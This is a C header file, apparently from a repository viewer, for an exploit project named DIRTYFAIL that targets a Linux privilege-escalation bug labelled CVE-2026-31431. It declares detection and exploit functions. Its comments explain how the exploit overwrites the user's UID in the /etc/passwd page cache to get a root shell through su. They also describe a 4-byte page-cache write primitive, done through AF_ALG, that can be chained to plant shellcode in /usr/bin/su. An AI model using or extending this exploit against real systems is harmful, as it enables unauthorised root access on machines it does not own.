34 lines
1.2 KiB
C
34 lines
1.2 KiB
C
/*
|
|
* DIRTYFAIL — copyfail.h
|
|
*
|
|
* Public surface for the Copy Fail (CVE-2026-31431) module.
|
|
*/
|
|
|
|
#ifndef DIRTYFAIL_COPYFAIL_H
|
|
#define DIRTYFAIL_COPYFAIL_H
|
|
|
|
#include "common.h"
|
|
|
|
/* Run all preflight checks and the sentinel-file primitive probe.
|
|
* Never modifies system files. */
|
|
df_result_t copyfail_detect(void);
|
|
|
|
/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page
|
|
* cache to "0000" and (optionally) execve `su <user>` to drop a root
|
|
* shell. `do_shell` controls whether to invoke su; if false, the patch
|
|
* is reverted via POSIX_FADV_DONTNEED before returning so the system
|
|
* does not stay in a broken state. */
|
|
df_result_t copyfail_exploit(bool do_shell);
|
|
|
|
/* Low-level building block: write 4 bytes into the page cache of
|
|
* `target_path` at `target_off`. Caller must have read access to
|
|
* the file. Same primitive that copyfail_exploit uses internally;
|
|
* exposed for exploit_su.c to chain ~12 calls into a 48-byte
|
|
* shellcode plant against /usr/bin/su. Returns true if the AF_ALG
|
|
* sequence completed; caller MUST verify via re-read. */
|
|
bool cf_4byte_write(const char *target_path,
|
|
off_t target_off,
|
|
const unsigned char four_bytes[4]);
|
|
|
|
#endif
|